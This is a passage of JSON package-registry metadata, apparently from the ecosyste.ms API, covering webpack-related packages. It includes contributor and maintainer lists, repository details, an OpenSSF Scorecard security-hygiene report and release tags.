api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4-modern-acorn/codemeta","maintainers":[{"uuid":"pastelsky","login":"pastelsky","name":null,"email":"shubham.kanodia10@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~pastelsky","role":null,"created_at":"2022-11-16T01:39:11.339Z","updated_at":"2022-11-16T01:39:11.339Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pastelsky/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5056461,"name":"org.webjars.npm:webpack","ecosystem":"maven","description":"WebJar for webpack","homepage":"https://www.webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"org.webjars.npm","versions_count":43,"first_release_published_at":"2015-05-21T03:36:20.000Z","latest_release_published_at":"2023-07-16T03:52:05.000Z","latest_release_number":"5.88.1","last_synced_at":"2026-09-03T00:15:52.877Z","created_at":"2022-07-27T23:45:34.474Z","updated_at":"2026-09-03T00:15:52.877Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.npm/webpack/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.npm/webpack/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"